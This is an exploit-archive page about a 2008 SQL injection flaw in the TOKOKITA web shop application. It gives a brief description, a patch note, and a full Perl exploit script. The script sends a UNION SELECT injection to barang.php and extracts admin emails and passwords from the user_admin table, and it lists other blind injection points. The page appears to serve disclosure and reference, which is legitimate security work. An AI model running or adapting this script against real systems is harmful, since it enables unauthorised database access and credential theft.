header-logo
Suggest Exploit
vendor:
TOKOKITA Web Application
by:
k1tk4t
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: TOKOKITA Web Application
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

TOKOKITA Multiple Remote SQL Injection

A vulnerability in the TOKOKITA web application allows an attacker to inject arbitrary SQL commands into the application. This can be exploited to gain access to the application's database and potentially gain access to sensitive information. The vulnerability exists in the 'catlist.php', 'catlist_detail.php' and 'barang.php' scripts, where user-supplied input is not properly sanitized before being used in an SQL query. This can be exploited to inject arbitrary SQL commands which will be executed in the context of the database user.

Mitigation:

The vendor has released a patch to address this issue. It is recommended that users upgrade to the latest version of the application.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# k1tk4t Public Security Advisory
# ////////////////////////////////////////////////////////////
# TOKOKITA Multiple Remote SQL Injection 
# Demosite	: http://www.tokokita.net/toko/
# Vendor	: http://www.tokokita.com/
# Kutu		: 1. catlist.php?cat_id=[Blind SQLi]
#		  2. catlist_detail.php?cat_id=[Blind SQLi]
#	          3. barang.php?produk_id=[SQLi]
# Terimakasih untuk ;
# str0ke,DNX,n0c0py,L41n,
# NTOS-Team->[fl3xu5,opt1lc,sakitjiwa],
# eCHo->[y3dips,K-159,lirva32,dan staff lainnya] 
use LWP::UserAgent;

if ( !$ARGV[1] ) {
	print "\n //////////////////////////////////////////////////////////////////";
	print "\n //                      ..::> k1tk4t <::..                      //";
	print "\n // TOKOKITA (barang.php produk_id) Remote SQL Injection Exploit //";
	print "\n //////////////////////////////////////////////////////////////////";
	print "\n[!] ";
	print "\n[!] Penggunaan : perl tokokita.pl [Site] [Path]";
	print "\n[!] Contoh     : perl tokokita.pl localhost /toko/";
	print "\n[!] ";
	print "\n";
	exit;
}
$site   = $ARGV[0];
$path   = $ARGV[1];
$sqlinj = "union+
select+
null,
null,
null,
concat(0x6b3174,email,0x316e),
null,
concat(0x6b3474,password,0x307574),
null,
null,
null,
null,
null+
from+
user_admin/*";    
$expl = "http://" . $site . $path . "barang.php?produk_id=-9+"
. $sqlinj;
$www  = new LWP::UserAgent;
print "\n\n [!] Injeksi SQL \n";
$res = $www->get($expl) or err ();
$hasil = $res->content;
if ( $hasil =~ /k1t(.*?)1n/ ) {
	print "\n [+] Username      : $1";
	$hasil =~ /k4t(.*?)0ut/, print "\n [+] Password      : $1";
	print "\n\n";
} 
else {
	print "\n [-] Exploit gagal ;)";
	exit();
}

# milw0rm.com [2008-06-24]

Navigation

Suggest Exploit

Services By CQR